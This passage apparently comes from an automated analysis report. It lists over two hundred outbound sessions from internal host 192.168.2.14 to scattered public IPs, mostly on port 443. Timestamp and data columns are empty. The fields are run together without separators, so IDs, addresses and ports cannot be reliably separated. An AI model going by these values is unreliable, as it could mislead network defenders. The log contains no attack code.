                                              16420192.168.2.1457600146.88.169.2328080
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16421192.168.2.1444696210.247.178.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16422192.168.2.144020418.62.86.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16423192.168.2.1444638176.78.186.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16424192.168.2.1439578220.86.30.168443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16425192.168.2.145778443.246.208.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16426192.168.2.1444132133.195.93.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16427192.168.2.1454534123.153.163.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16428192.168.2.1440450172.3.87.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16429192.168.2.145215032.102.194.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16430192.168.2.1460574201.42.143.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16431192.168.2.1454472202.228.9.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16432192.168.2.145166275.177.101.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16433192.168.2.144431296.4.65.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16434192.168.2.1445142100.29.100.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16435192.168.2.144026061.107.67.147443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16436192.168.2.1434930222.128.18.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16437192.168.2.1459284143.245.70.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16438192.168.2.1448220188.234.226.96443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16439192.168.2.1441138124.23.247.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16440192.168.2.1439350195.245.242.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16441192.168.2.1451106177.79.93.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16442192.168.2.145843819.48.80.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16443192.168.2.144724850.111.37.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16444192.168.2.145251472.153.254.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16445192.168.2.143565068.194.47.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16446192.168.2.1446812131.144.158.5443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16447192.168.2.145647868.243.85.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16448192.168.2.143432244.228.89.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16449192.168.2.1455744209.89.202.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16450192.168.2.1456534193.202.151.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16451192.168.2.1436612135.90.124.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16452192.168.2.1444084196.254.83.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16453192.168.2.1449618110.53.180.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16454192.168.2.1445116105.81.73.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16455192.168.2.1439530218.233.214.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16456192.168.2.1439716150.16.38.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16457192.168.2.1455982203.152.119.95443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16458192.168.2.1460332101.57.163.13443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16459192.168.2.1454980213.130.37.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16460192.168.2.144734093.127.177.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16461192.168.2.1443522108.91.73.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16462192.168.2.1446134143.97.202.15443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16463192.168.2.145316853.194.229.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16464192.168.2.1457282139.46.2.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16465192.168.2.145141417.99.247.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16466192.168.2.1439924156.0.29.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16467192.168.2.143498046.123.85.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16468192.168.2.1439764179.168.171.116443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16469192.168.2.146005498.172.184.163443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16470192.168.2.144316886.217.129.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16471192.168.2.1452420136.153.146.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16472192.168.2.1458612149.229.121.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16473192.168.2.1432824150.81.219.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16474192.168.2.146086825.54.151.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16475192.168.2.1449644219.81.163.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16476192.168.2.144389062.226.27.46443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16477192.168.2.1440852134.254.248.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16478192.168.2.144660820.76.61.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16479192.168.2.1452574155.101.216.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16480192.168.2.145201261.155.116.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16481192.168.2.145779464.43.43.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16482192.168.2.1443694109.87.55.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16483192.168.2.1451268218.8.102.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16484192.168.2.143522039.198.128.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16485192.168.2.144868273.224.75.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16486192.168.2.146001269.137.216.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16487192.168.2.14514969.133.101.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16488192.168.2.1442842123.128.36.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16489192.168.2.1455712161.135.243.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16490192.168.2.143541420.83.239.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16491192.168.2.1443218155.65.53.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16492192.168.2.146044845.44.78.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16493192.168.2.145972298.37.81.115443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16494192.168.2.143339853.146.218.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16495192.168.2.145519675.40.165.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16496192.168.2.1443788211.134.193.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16497192.168.2.145292420.53.237.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16498192.168.2.1446984112.227.75.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16499192.168.2.1442252116.171.63.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16500192.168.2.145101877.115.251.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16501192.168.2.14424005.124.130.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16502192.168.2.1453264115.205.137.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16503192.168.2.14556981.103.226.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16504192.168.2.145103058.206.49.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16505192.168.2.144745823.74.225.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16506192.168.2.1435844153.64.247.178443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16507192.168.2.1456320198.216.152.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16508192.168.2.1440362144.76.111.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16509192.168.2.143889452.30.70.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16510192.168.2.1433198153.34.72.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16511192.168.2.1455090161.166.216.242443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16512192.168.2.1444224176.156.97.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16513192.168.2.1452294197.76.201.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16514192.168.2.145410637.192.214.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16515192.168.2.1433416147.137.226.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16516192.168.2.144979812.220.23.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16517192.168.2.14356848.9.114.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16518192.168.2.145146824.65.62.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16519192.168.2.145663067.179.112.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16520192.168.2.1439096208.77.164.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16521192.168.2.1450818163.75.7.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16522192.168.2.1441088147.212.245.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16523192.168.2.1445486217.60.27.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16524192.168.2.144802248.33.97.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16525192.168.2.143983053.242.249.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16526192.168.2.1439778206.183.231.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16527192.168.2.1451918173.28.159.208443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16528192.168.2.14552188.94.176.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16529192.168.2.145170265.195.93.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16530192.168.2.1449682222.242.205.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16531192.168.2.145870071.246.139.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16532192.168.2.1451850166.87.45.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16533192.168.2.1450530139.43.249.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16534192.168.2.1433822164.145.186.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16535192.168.2.145901666.148.16.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16536192.168.2.1452428209.29.208.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16537192.168.2.14511508.19.135.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16538192.168.2.145188458.73.12.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16539192.168.2.145405046.60.114.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16540192.168.2.14485062.127.153.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16541192.168.2.1436726182.247.97.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16542192.168.2.145792071.89.238.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16543192.168.2.1444046219.70.218.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16544192.168.2.1459728154.205.147.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16545192.168.2.1451174133.27.8.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16546192.168.2.1435518132.182.51.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16547192.168.2.143976234.195.88.92443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16548192.168.2.1447334201.164.81.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16549192.168.2.145629825.204.66.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16550192.168.2.1448854216.99.16.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16551192.168.2.1440916191.33.53.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16552192.168.2.1454182220.215.247.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16553192.168.2.1450830190.61.182.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16554192.168.2.1437288136.246.239.124443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16555192.168.2.1434436173.162.23.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16556192.168.2.144906836.13.13.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16557192.168.2.1435456107.17.197.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16558192.168.2.1445494121.145.144.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16559192.168.2.1452378188.125.208.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16560192.168.2.1435114208.225.190.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16561192.168.2.1444590191.115.100.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16562192.168.2.1442312165.137.30.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16563192.168.2.1452952219.234.187.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16564192.168.2.145962271.102.94.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16565192.168.2.1442642113.144.93.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16566192.168.2.1457640105.97.160.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16567192.168.2.1441480120.160.128.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16568192.168.2.1458944219.123.47.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16569192.168.2.1455056192.247.134.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16570192.168.2.145479477.26.194.201443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16571192.168.2.144215470.6.100.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16572192.168.2.144523264.193.110.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16573192.168.2.1440994148.207.102.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16574192.168.2.14352889.203.147.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16575192.168.2.1443776205.4.26.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16576192.168.2.14416629.84.66.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16577192.168.2.144952451.170.226.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16578192.168.2.1439276216.255.189.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16579192.168.2.1459944179.104.116.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16580192.168.2.1437734133.153.105.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16581192.168.2.1436474160.34.66.182443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16582192.168.2.1457906101.124.230.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16583192.168.2.1447562164.190.186.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16584192.168.2.1434898211.150.126.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16585192.168.2.1453050163.27.240.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16586192.168.2.144228082.10.236.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16587192.168.2.1432970130.163.59.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16588192.168.2.1446076132.73.39.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16589192.168.2.1445790205.189.184.31443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16590192.168.2.145101438.207.30.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16591192.168.2.1457424138.178.57.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16592192.168.2.1447344176.14.70.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16593192.168.2.1459810155.186.117.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16594192.168.2.145738244.237.151.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16595192.168.2.1437670128.59.215.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16596192.168.2.1435812137.93.68.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16597192.168.2.1446504154.232.130.187443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16598192.168.2.1434384105.167.131.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16599192.168.2.145865690.1.135.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16600192.168.2.145439044.198.209.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16601192.168.2.144654861.229.157.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16602192.168.2.1451634197.105.99.194443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16603192.168.2.144473266.38.58.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16604192.168.2.143642248.252.6.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16605192.168.2.1438288202.111.2.135443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16606192.168.2.1447790210.226.85.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16607192.168.2.144865240.99.51.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16608192.168.2.1434202219.215.195.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16609192.168.2.1443704184.194.67.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16610192.168.2.1435612158.25.173.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16611192.168.2.144294852.173.24.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16612192.168.2.145910848.7.142.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16613192.168.2.1432892167.54.4.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16614192.168.2.144106097.123.227.32443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16615192.168.2.1458880105.28.64.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16616192.168.2.143835092.53.198.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16617192.168.2.1433908121.115.237.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16618192.168.2.143653872.87.77.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16619192.168.2.145154042.217.48.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16620192.168.2.1446168101.75.19.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16621192.168.2.1437592130.128.148.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16622192.168.2.1458146206.59.183.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16623192.168.2.143302849.159.251.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16624192.168.2.145184458.231.17.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16625192.168.2.1433668119.192.39.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16626192.168.2.1456880176.9.65.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16627192.168.2.144943637.27.135.23443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16628192.168.2.145510623.149.200.224443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16629192.168.2.1455224222.43.15.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16630192.168.2.1433594150.64.192.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16631192.168.2.145000642.64.126.125443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16632192.168.2.1459394100.223.142.17443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16633192.168.2.1456750155.22.120.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16634192.168.2.1453682115.168.205.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16635192.168.2.1436864205.181.149.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16636192.168.2.145013071.180.220.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16637192.168.2.145958270.145.33.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16638192.168.2.1446086140.35.64.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16639192.168.2.1435676199.98.178.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16640192.168.2.1441324141.30.28.230443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              16641192.168.2.1447928115.245.98.101443
                                              TimestampBytes transferredDirectionData


